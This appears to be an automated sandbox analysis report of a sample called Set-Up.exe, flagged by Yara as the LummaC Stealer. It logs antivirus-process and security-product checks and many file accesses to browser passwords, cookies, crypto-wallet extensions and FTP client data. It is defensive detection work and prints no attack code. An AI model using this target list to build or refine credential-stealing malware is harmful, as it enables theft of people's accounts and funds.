Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_005B041A __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

3_2_005B041A

Source: C:\Users\user\Desktop\Set-Up.exe

3_2_006C8FB0

Source: C:\Users\user\Desktop\Set-Up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avgrsx.exe
Source: Set-Up.exe	Binary or memory string: webproxy.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avcenter.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: alsvc.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: msmpeng.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: vrmonsvc.exe
Source: Set-Up.exe, Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: nod32.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avgui.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: ashwebsv.exe
Source: Set-Up.exe, Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: fsdfwd.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: a2service.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: bdagent.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: psctrls.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avguard.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: cmain.exe
Source: Set-Up.exe, Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avp.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: zlclient.exe
Source: Set-Up.exe, 00000003.00000003.1563242115.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: aswupdsv.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: ashWebSv.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: avgnt.exe
Source: Set-Up.exe, 00000003.00000003.1540645383.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536386695.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580265202.0000000000B16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: vipre.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: mbam.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: ashserv.exe
Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: ashmaisv.exe

Source: C:\Users\user\Desktop\Set-Up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1563331052.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1581016383.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1536461322.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-Up.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
